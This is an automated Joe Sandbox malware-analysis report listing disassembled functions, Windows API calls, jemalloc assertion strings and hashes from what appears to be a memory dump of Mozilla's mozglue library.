floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3EE2

Part of subcall function 6CCF6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6CCF61DD
Part of subcall function 6CCF6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6CCF622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF4157

Part of subcall function 6CCF6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CCF6250
Part of subcall function 6CCF6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCF6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CCF484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CCF4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CCF4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CCF4896
free.MOZGLUE ref: 6CCF489F

Strings

, xrefs: 6CCF4CD2

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: ff282f6a4410beb230028b7241d7c7bfd13a08724550b63c6cf6cb410eaa5aed
Instruction ID: 5769cc747e6491cc65f103701b323b21b5b8f780b38f2c06ee85d6cd54bdc2e8
Opcode Fuzzy Hash: ff282f6a4410beb230028b7241d7c7bfd13a08724550b63c6cf6cb410eaa5aed
Instruction Fuzzy Hash: 39F25B74908B808FC765CF28C18469AFBF5FFCA344F118A5ED99997711EB319886CB42

Function 6CCA64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CCA64DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CCA64F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CCA6505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CCA6518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6CCA652B
memcpy.VCRUNTIME140(?,?,?), ref: 6CCA671C
GetCurrentProcess.KERNEL32 ref: 6CCA6724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CCA672F
GetCurrentProcess.KERNEL32 ref: 6CCA6759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CCA6764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CCA6A80
GetSystemInfo.KERNEL32(?), ref: 6CCA6ABE
__Init_thread_footer.LIBCMT ref: 6CCA6AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCA6AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCA6AF7

Strings

detoured.dll, xrefs: 6CCA64DA
nvd3d9wrap.dll, xrefs: 6CCA6500
user32.dll, xrefs: 6CCA6526
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6CCA6798
_etoured.dll, xrefs: 6CCA64ED
nvdxgiwrap.dll, xrefs: 6CCA6513

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: d31eb77b460af0aeb8ff87edb7c3b135527ee2e900296262c8daa79f64e134da
Instruction ID: aa6d348f4cd06cb4d387e08088a6a0961b089de66d2a2d5144809fb8257812db
Opcode Fuzzy Hash: d31eb77b460af0aeb8ff87edb7c3b135527ee2e900296262c8daa79f64e134da
Instruction Fuzzy Hash: 9AF10670A0561A9FDB20CFA9CC4C7DAB7B4AF45318F144199D919E3B81E731AE86CF90

Function 6CCFC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6CCFC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6CCFC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6CCFC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFCC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CCFCD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFDB40
memcpy.VCRUNTIME140(?,?,?), ref: 6CCFDB62
memcpy.VCRUNTIME140(?,?,?), ref: 6CCFDB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFDD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CCFDE95
memcpy.VCRUNTIME140(?,?,?), ref: 6CCFE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFE432
memcpy.VCRUNTIME140(?,?,?), ref: 6CCFE472

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 29716b6d164cef4efcf3d91189df7571d1b30b662e46fb1dc4d272cc694957a2
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: DB339171E0021ACFCB14CF98C8806EDBBF2FF49314F294269D965AB755E731A946CB90

Function 6CCAFD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CD1E7B8), ref: 6CCAFF81
LeaveCriticalSection.KERNEL32(6CD1E7B8), ref: 6CCB022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6CCB0240
EnterCriticalSection.KERNEL32(6CD1E768), ref: 6CCB025B
LeaveCriticalSection.KERNEL32(6CD1E768), ref: 6CCB027B

Strings

<jemalloc>, xrefs: 6CCB0D62, 6CCB0D76, 6CCB0DA7
MOZ_RELEASE_ASSERT(mNode), xrefs: 6CCAFE99, 6CCAFEB7, 6CCAFED3, 6CCB0DB8, 6CCB0DD3, 6CCB19B4
: (malloc) Error in VirtualFree(), xrefs: 6CCB0D67, 6CCB0D7B, 6CCB0DAC

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 497c74dbb5271a25fcd2d499a24efa6473f06a8b001e867a4b29101ede54dde4
Instruction ID: 0ad41b9c4b26e8a855b39ac3b6504ae6a311f154bba53df169e77c72f885beca
Opcode Fuzzy Hash: 497c74dbb5271a25fcd2d499a24efa6473f06a8b001e867a4b29101ede54dde4
Instruction Fuzzy Hash: D7C2D1B1A057418FD714CF69C580716BBE1BF89328F28C66DE4A99BBD5E731E801CB81

Function 6CCFE680 Relevance: 31.1, APIs: 22, Instructions: 3648COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00004014), ref: 6CCFE811
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFEAA8
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CCFEBD5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFEEF6
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFF223
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CCFF322
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CD00E03
memcpy.VCRUNTIME140(?,?,?,?), ref: 6CD00E54
memcpy.VCRUNTIME140(?,?,?), ref: 6CD00EAE
memcpy.VCRUNTIME140(?,?,?), ref: 6CD00ED4

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 69f05e0babb866ce21c80348513c7da21ea2efecee02c60470e10cf88611b86d
Instruction ID: 3f95737d07f30132525e32863639216df61311e2f547014a5b6a34f11f47043b
Opcode Fuzzy Hash: 69f05e0babb866ce21c80348513c7da21ea2efecee02c60470e10cf88611b86d
Instruction Fuzzy Hash: BC635B71E0025A8FCB14CFACC89069DFBF2FF89314F298269D855AB755D730A946CB90

Function 6CCD3E50 Relevance: 27.0, APIs: 13, Strings: 2, Instructions: 765COMMON

Download Yara Rule

APIs

Part of subcall function 6CCF7770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CCD3E7D,?,?,?,6CCD3E7D,?,?), ref: 6CCF777C

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6CCD3F17
memset.VCRUNTIME140(?,00000000,00000110), ref: 6CCD3F5C
VerSetConditionMask.NTDLL ref: 6CCD3F8D
VerSetConditionMask.NTDLL ref: 6CCD3F99
VerSetConditionMask.NTDLL ref: 6CCD3FA0
VerSetConditionMask.NTDLL ref: 6CCD3FA7
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CCD3FB4

Strings

nvinit.dll, xrefs: 6CCD4479
nvd3d9wrap.dll, xrefs: 6CCD4466

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
String ID: nvd3d9wrap.dll$nvinit.dll
API String ID: 1189858803-2380496106
Opcode ID: 2cf6d2cc8f56a295d432a63bd3aca61a7d34be15183935780146caa912211791
Instruction ID: c1a97e332872c54730559109e6d983276ad2005b627455a07ff038c27a1c2c10
Opcode Fuzzy Hash: 2cf6d2cc8f56a295d432a63bd3aca61a7d34be15183935780146caa912211791
Instruction Fuzzy Hash: E1520571610B898FD711DF74C894AAB77E9AF45308F05092DE596CBB42EB34F90ACB60

Function 6CCBED10 Relevance: 25.4, APIs: 16, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6CCBEE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CCBEFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6CCC1695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCC16B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6CCC1770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CCC1A3E

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID:
API String ID: 3693777188-0
Opcode ID: 2c79216e884793580e512a014c17339fbb585e2c810df928cdd6a4332d4346e0
Instruction ID: cc2e14c1d0b920f294d21e20c40651c4c85939b24c1ac78081f0cfb71e2e3296
Opcode Fuzzy Hash: 2c79216e884793580e512a014c17339fbb585e2c810df928cdd6a4332d4346e0
Instruction Fuzzy Hash: C7B31875E00219CFCB14CFA9C890A9DB7B2BF49304F2981A9D459BB745E730AD86CF91

Function 6CCAFEF0 Relevance: 23.8, APIs: 13, Strings: 2, Instructions: 1294memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CD1E7B8), ref: 6CCAFF81
LeaveCriticalSection.KERNEL32(6CD1E7B8), ref: 6CCB022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6CCB0240
EnterCriticalSection.KERNEL32(6CD1E768), ref: 6CCB025B
LeaveCriticalSection.KERNEL32(6CD1E768), ref: 6CCB027B

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6CCAFE99, 6CCAFEB7, 6CCAFED3, 6CCB0DB8, 6CCB0DD3, 6CCB19B4, 6CCB1A10
MOZ_CRASH(), xrefs: 6CCB0CA7

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3566792288
Opcode ID: 176697444084266b2584c2992590d3bbcafaacdef5fe471ccc9285671a6f6b94
Instruction ID: 52d679462c8a2b4ab846cb53c34a6169cb0e40b3e7a37de1df79ec9795d4e159
Opcode Fuzzy Hash: 176697444084266b2584c2992590d3bbcafaacdef5fe471ccc9285671a6f6b94
Instruction Fuzzy Hash: CDB2CEB1A057418FD714CF6DC590716BBE1BF89328F28C66CE86A9BB95E730E841CB41

Function 6CCE2E4E Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 579stringCOMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CCE2ED3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCE2EE7
MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6CCE2F0D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCE3214
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CCE3242
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCE36BF

Strings

set , xrefs: 6CCE36EC
get , xrefs: 6CCE3205
MOZ_PROFILER_SYMBOLICATE, xrefs: 6CCE378D

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: strlen$AddressCode$DescribeDetailsFormat
String ID: MOZ_PROFILER_SYMBOLICATE$get $set
API String ID: 2257098003-3318126862
Opcode ID: 444d647c0413699c4c0d317132a6d14a16355dddff43537b3e952c2fc6743b08
Instruction ID: b96038b46d05f4cb800ab4f320f15b4a0501d3bb6b7dc8d4f8c63f510d944ff7
Opcode Fuzzy Hash: 444d647c0413699c4c0d317132a6d14a16355dddff43537b3e952c2fc6743b08
Instruction Fuzzy Hash: 2A3250706083819FD324CF24C49069FB7E2AFCA318F588D5DE59987761EB31E94ACB52

Function 6CCBD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CD1E784,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD4F2
LeaveCriticalSection.KERNEL32(6CD1E784,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD50B

Part of subcall function 6CC9CFE0: EnterCriticalSection.KERNEL32(6CD1E784), ref: 6CC9CFF6
Part of subcall function 6CC9CFE0: LeaveCriticalSection.KERNEL32(6CD1E784), ref: 6CC9D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD52E
EnterCriticalSection.KERNEL32(6CD1E7DC), ref: 6CCBD690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CCBD6A6
LeaveCriticalSection.KERNEL32(6CD1E7DC), ref: 6CCBD712
LeaveCriticalSection.KERNEL32(6CD1E784,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CCBD7EA

Strings

<jemalloc>, xrefs: 6CCBD827
: (malloc) Error initializing arena, xrefs: 6CCBD82C

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: fdb56529a4f7ee40f20841bb8ddd3ecef079689454a37a5780c76b5c015f6d05
Instruction ID: 8047e8378b467e4f2f4b89691e50fa2ced921e6f3bb7bac1aeb6e5df827448fb
Opcode Fuzzy Hash: fdb56529a4f7ee40f20841bb8ddd3ecef079689454a37a5780c76b5c015f6d05
Instruction Fuzzy Hash: 88910671A047018FE718CFA9C19476AB7E1FB89314F14492EE55AE7F89E730E845CB82

Function 6CCB5E90 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 2651COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-0000000C), ref: 6CCB5EDB
memset.VCRUNTIME140(6CCF7765,000000E5,55CCCCCC), ref: 6CCB5F27
LeaveCriticalSection.KERNEL32(?), ref: 6CCB5FB2
memset.VCRUNTIME140(6CCF7765,000000E5,D1C09015), ref: 6CCB61F0
VirtualFree.KERNEL32(-00000001,00100000,00004000), ref: 6CCB7652

Strings

MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CCB730D
MOZ_RELEASE_ASSERT(mNode), xrefs: 6CCB7BCD, 6CCB7C1F, 6CCB7C34, 6CCB80FD
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CCB72E3
MOZ_CRASH(), xrefs: 6CCB7BA4
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CCB72F8

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSectionmemset$EnterFreeLeaveVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 2613674957-1127040744
Opcode ID: 85f313b6e8360dac4528ca379f586097c0edb5b5274399d5490dc6dcff34f632
Instruction ID: e28f8189121a008ddf7504f0ae380af1686af3b3b89e4bc56f85ff5794333ef9
Opcode Fuzzy Hash: 85f313b6e8360dac4528ca379f586097c0edb5b5274399d5490dc6dcff34f632
Instruction Fuzzy Hash: FF33AE71A05B018FC308CF69C590615FBE2BF85328F29C6ADE8699F7A5E731E841CB51

Function 6CCF4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6CCF4EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF4F2E
moz_xmalloc.MOZGLUE ref: 6CCF4F52
memset.VCRUNTIME140(00000000,00000000), ref: 6CCF4F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF52B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF52E6
Sleep.KERNEL32(00000010), ref: 6CCF5481
free.MOZGLUE(?), ref: 6CCF5498

Strings

(, xrefs: 6CCF5250

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: d1f1b5a5b4457c1936a7f65d0d4c3ed694648b10273473fcde889609cdd12636
Instruction ID: cf18dccd33c5e968bab6af3614ac5cc3d2ab3a8af34cf2c3bcaeaac599000965
Opcode Fuzzy Hash: d1f1b5a5b4457c1936a7f65d0d4c3ed694648b10273473fcde889609cdd12636
Instruction Fuzzy Hash: 35F1E371A18B008FD716CF38C85162BB7FAAFD6384F05872EF956A7651EB31D4428B81

Function 6CCB9E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CCB9EB8
LeaveCriticalSection.KERNEL32(?), ref: 6CCB9F24
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CCB9F34
LeaveCriticalSection.KERNEL32(?), ref: 6CCBA823
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CCBA83C
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CCBA849

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6CCBA8B1, 6CCBA8D4, 6CCBA8EF

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 2950001534-1351931279
Opcode ID: b2b31110281d8063696675fdbaa968a20aa0d4997060a68f0c2bf862d8840f0c
Instruction ID: ed27857beeb1d5e32e12341c79bc8936b1ad281374d2417f5890a86ba36d4e86
Opcode Fuzzy Hash: b2b31110281d8063696675fdbaa968a20aa0d4997060a68f0c2bf862d8840f0c
Instruction Fuzzy Hash: D9726E72A157118FD704CF69C540615FBE1BFC9328F29C66DE8A9AB791E335E842CB80

Function 6CCE2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CCE2C31
